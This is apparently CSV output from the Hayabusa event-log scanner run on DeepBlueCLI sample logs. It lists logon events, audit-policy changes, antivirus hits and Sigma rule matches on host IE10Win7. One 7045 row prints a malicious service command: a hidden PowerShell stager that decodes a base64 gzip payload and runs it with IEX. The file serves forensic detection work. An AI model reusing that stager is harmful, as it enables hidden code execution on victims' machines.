2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
